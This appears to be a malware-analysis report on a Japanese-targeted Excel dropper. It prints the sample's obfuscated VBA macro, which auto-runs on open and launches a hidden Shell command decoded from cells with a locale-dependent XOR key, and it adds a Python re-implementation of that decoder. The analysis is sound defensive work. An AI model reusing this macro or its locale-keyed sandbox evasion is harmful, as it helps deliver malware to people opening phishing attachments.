Xls.Dropper.Agent-7005625-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 cb0b8a2c1ca33d89…

MALICIOUS

Office (OLE)

Size: 87.5 KB
Created: 2019-05-10 10:42:31
Authoring application: Microsoft Excel
First seen: 2019-05-31
MD5: e248de626ccf3853a5435a7014c2cdb5
SHA-1: 156c29dcf64cb944794b3ac88c4e04eb99b8b048
SHA-256: cb0b8a2c1ca33d89a2181e58a0948bd88f478a39af45d0b54c53913cd89a5aba
Risk score: 180

Malware Insights

Xls.Dropper.Agent-7005625-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The critical heuristic OLE_VBA_SHELL together with a Workbook_Open handler indicates that the document runs code as soon as it is opened with macros enabled. The VBA is obfuscated: Workbook_Open calls mileand, which hands a string to Shell# with window style 500 - 2 - 198 - 300 = 0 (vbHide), so the spawned process has no visible window. The command line itself is not present in the macro source; it is assembled at run time from worksheet cells. Act() reads cell A3 (CC(3, 2 - 1) is Cells(3, 1)) as a sequence of 3-digit groups, XORs each group with a cycling key, and enc0000() then subtracts 2 from every character code; the middle of the command is cell A1 with '-' replaced by '+' (CC(0 + 1, 1 - 0) is Cells(1, 1)), consistent with a Base64 blob stored in a form that avoids '+'. The key is fgda432tuy56dfg4365tdrgfzg * 3, which is Application.International(xlCountrySetting) * 3 (xlDate evaluates to 2, and International(2) is xlCountrySetting, the Windows regional country code), so the payload decodes correctly only under the regional setting the author targeted; the module names このワークブック and シート1 ('ThisWorkbook' and 'Sheet1' in a Japanese Excel) point to Japan (country code 81, key "243"), and a sandbox running with a different locale produces garbage instead of the command. The guards If xlXmlExportValidationFailed > 0, If xlMillimeters > 0 and If xlListConflictDiscardAllConflicts > 0 are opaque predicates on Excel constants (1, 2 and 2) that are always true; Ags and malibu() are dead code, and the ThisWorkbook module body opens with roughly 75 blank lines that push the code out of the VBA editor's initial view. Because the cell contents were not carved, the decoded command and any download URL cannot be confirmed from this page; the dropper classification rests on the ClamAV signature Xls.Dropper.Agent-7005625-0 and the hidden Shell() execution.

Heuristics (4)

  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Xls.Dropper.Agent-7005625-0
  • OLE_VBA_MACROS (medium, 2 related findings): document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_WBOPEN (high): Workbook_Open macro (runs automatically when the workbook is opened with macros enabled)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2293 bytes
SHA-256: 36c5c1e771afaaeadead3227d12b9132f750b5a486612d74f1efb024daa89d6a

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "このワークブック"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Function Act(ByVal mathh As String, ByVal Paraf As String) As String
Dim a, b, c, d As String
Dim kios As Long
Dim doggy As Long
Dim cn As Long
c = mathh
b = Paraf
a = ""
kios = Len(c)
doggy = Len(b)
For cn = 1 To kios Step 3
a = a + Chr(Val(Mid(c, cn, 3)) Xor Asc(Mid(b, (Int(cn / 3) Mod doggy) + 1, 1)))
Next cn
Act = a
End Function
Private Sub Workbook_Open()
'MsgBox
If xlXmlExportValidationFailed > 0 Then mileand
End Sub
Function tebinner()
tebinner = CC(3, 2 - 1)
End Function

Function fgda432tuy56dfg4365tdrgfzg()
fdsgfadsrff436tgdfzf33546s = 1 + (Application.International(polle) - 1)
fgda432tuy56dfg4365tdrgfzg = fdsgfadsrff436tgdfzf33546s
End Function

Function polle()
polle = ((xlDate))
End Function


Function enc0000(aAA As String)
Dim ligiums, efrat As String
Dim wq, Dego, vert As Integer
Dego = 2
ligiums = aAA
For wq = 1 To Len(ligiums)
vert = Asc(Mid(ligiums, wq, 1)) - Dego
efrat = efrat & Chr(vert)
Next wq
enc0000 = efrat
End Function

Private Sub mileand()
If xlMillimeters > 0 Then
Ags = 3.24453785683477E+16
If xlListConflictDiscardAllConflicts > 0 Then XlForecastChartTypes = (Shell#(enc0000(Left(Act(tebinner, fgda432tuy56dfg4365tdrgfzg * 3), 261)) & Replace(CC(0 + 1, 1 - 0), "-", "+") & enc0000(Right(Act(tebinner, fgda432tuy56dfg4365tdrgfzg * 3), 216)), 500 - 2 - 198 - 300))
End If
End Sub

Function CC()
CC = Cells
End Function

Function malibu()
malibu = enc0000(Leftfgda432tuy56dfg4365tdrgfzg * 3)
End Function

Attribute VB_Name = "シート1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
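The decoding chain used by mileand(), re-implemented in Python as an added analysis helper. This is not code from the report or from the sample: it mirrors Act(), enc0000(), the locale-derived key and the Left/Right split so the Shell argument can be rebuilt offline once the cell contents are available. Because cells A1 and A3 were not carved, the inputs below are constructed with the inverse transform (encode_cell) purely to exercise the algorithm; the country codes 81 (Japan) and 1 (US) are the values Application.International(xlCountrySetting) returns under those regional settings.

```python
"""Re-implementation of the sample's Act() / enc0000() decoding chain.

Added analysis helper, not code from the report or the sample. The real
inputs (cells A3 and A1) were not carved, so encode_cell() builds
CONSTRUCTED test data with the inverse transform.
"""
import re


def vba_val(s: str) -> int:
    """Approximates VBA Val() for the 3-character groups Act() feeds it:
    leading whitespace and an optional sign are accepted, parsing stops at
    the first non-digit, and a group with no digits yields 0."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def locale_key(country_setting: int) -> str:
    """fgda432tuy56dfg4365tdrgfzg() * 3. Application.International(xlDate) is
    International(2) == xlCountrySetting, the Windows regional country code
    (81 = Japan, 1 = US). VBA coerces the numeric product to a string when it
    is passed to the ByVal ... As String parameter of Act()."""
    return str(country_setting * 3)


def act(digits: str, key: str) -> str:
    """Act(): walk the cell text in 3-character groups; group i is Val()'d and
    XORed with Asc(key[i mod Len(key)]). The VBA index expression
    (Int(cn / 3) Mod doggy) + 1 is 1-based; this is the 0-based equivalent."""
    out = []
    for i, pos in enumerate(range(0, len(digits), 3)):
        group = digits[pos:pos + 3]
        out.append(chr(vba_val(group) ^ ord(key[i % len(key)])))
    return "".join(out)


def enc0000(s: str) -> str:
    """enc0000(): subtract Dego (2) from every character code."""
    return "".join(chr(ord(ch) - 2) for ch in s)


def vba_left(s: str, n: int) -> str:
    """Left(s, n): whole string when n >= Len(s)."""
    return s[:n]


def vba_right(s: str, n: int) -> str:
    """Right(s, n): whole string when n >= Len(s), empty string for n = 0."""
    return s[max(len(s) - n, 0):] if n > 0 else ""


def build_command(a3: str, a1: str, country_setting: int,
                  left_len: int = 261, right_len: int = 216) -> str:
    """Mirror of the Shell# argument in mileand():
        enc0000(Left(Act(A3, key), 261)) & Replace(A1, "-", "+")
        & enc0000(Right(Act(A3, key), 216))
    261/216 are the sample's split lengths; they are parameters here so the
    constructed test data can be shorter than the real cell contents."""
    decoded = act(a3, locale_key(country_setting))
    return (enc0000(vba_left(decoded, left_len))
            + a1.replace("-", "+")
            + enc0000(vba_right(decoded, right_len)))


def shell_window_style() -> int:
    """Shell's second argument in the sample, 500 - 2 - 198 - 300, is vbHide (0):
    the spawned process gets no visible window."""
    return 500 - 2 - 198 - 300


def encode_cell(plain: str, key: str) -> str:
    """Inverse of enc0000(act(...)): add 2 to each code, XOR with the cycling
    key byte, emit 3-digit decimal groups. Used only to construct test data."""
    return "".join(f"{(ord(ch) + 2) ^ ord(key[i % len(key)]):03d}"
                   for i, ch in enumerate(plain))


if __name__ == "__main__":
    # Constructed example: a harmless command split the way the sample does it.
    left, right = "cmd.exe /c echo ", " > constructed.txt"
    key = locale_key(81)                    # "243": Japanese regional setting
    a3 = encode_cell(left + right, key)     # what cell A3 would hold
    a1 = "Y29uc3RydWN0ZWQ-"                 # constructed stand-in for cell A1
    print(build_command(a3, a1, 81, len(left), len(right)))
    print(build_command(a3, a1, 1, len(left), len(right)))   # wrong locale: garbage
```

To decode the real sample, paste the text of A3 and A1 from the workbook into build_command with the default 261/216 lengths and the country code of the locale you believe was targeted; if the output is not printable, try the other plausible country codes before concluding the cells were altered.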